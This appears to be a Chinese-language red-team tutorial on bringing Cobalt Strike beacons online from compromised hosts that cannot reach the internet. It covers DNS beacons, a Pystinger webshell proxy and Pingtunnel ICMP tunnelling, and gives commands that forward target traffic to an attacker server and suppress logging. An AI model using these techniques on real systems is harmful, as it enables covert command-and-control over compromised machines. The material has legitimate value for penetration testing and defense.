不出网上线cs

通过DNS上线

在拿到网站后发现只有DNS能出网，这时候就可以通过DNS上线
第一步需要一个域名，然后配置域名的ns记录

在cs的监听器中新增一个DNS监听器，注意选择Beacon DNS

如果出现下面这种错误表示53端口被systemd-resolved占用了
关闭方法：systemctl stop system-resolved

生成一个马运行后上线

在上线之后，图标是一个黑框，与http和tcp的不一样它没有60秒的睡眠，有时甚至以为beacon死掉了，其实如果要和beacon交互还需要输入checkin命令，这时候图标就会变回正常上线时的图标，但速度是真的慢，所以需要修改一下传输方式，输入mode dns-txt命令后，速度就会比刚才快了,但进行上传下载时还是慢。

稳定性取决于网络情况，就算修改为dns-txt，相比于默认方式的快了许多，但进行上传和下载的时候还是很难受。

通过Pystinger上线cs

pystinger可通过webshell实现sock4代理、端口映射，在无法出网的机器上上线cs。
下载地址：https://github.com/FunnyWolf/pystinger
1.将webshell上传到服务器，能正常访问

将文件上传到目标服务器后启动。

linux：./stinger_server 0.0.0.0
windows：start stinger_server.exe 0.0.0.0

在自己的cs服务器上运行
./stinger_client -w http://目标web地址/proxy.php -l 127.0.0.1 -p 60000
意思是将目标流量转发到自己服务器的60000端口

监听器配置

生成马，目标服务器运行后上线

通过icmp上线cs

pingtunnel
下载地址：https://github.com/esrrhs/pingtunnel
该工具是将流量伪装成icmp流量
1.先在自己的服务器上开启服务端
命令：./pingtunnel -type server

2.客户端命令:pingtunnel.exe -type client -l 127.0.0.1:8888 -s 192.168.1.71-t 192.168.1.71:9999 -tcp 1 -noprint 1 -nolog 1
这里建议带上-noprint 1 -nolog 1 防止产生大量日志和数据

这时候客户端已经成功链接上服务端

3.创建两个监听器

用127.0.0.1的监听器生成木马上传到服务器运行后成功上线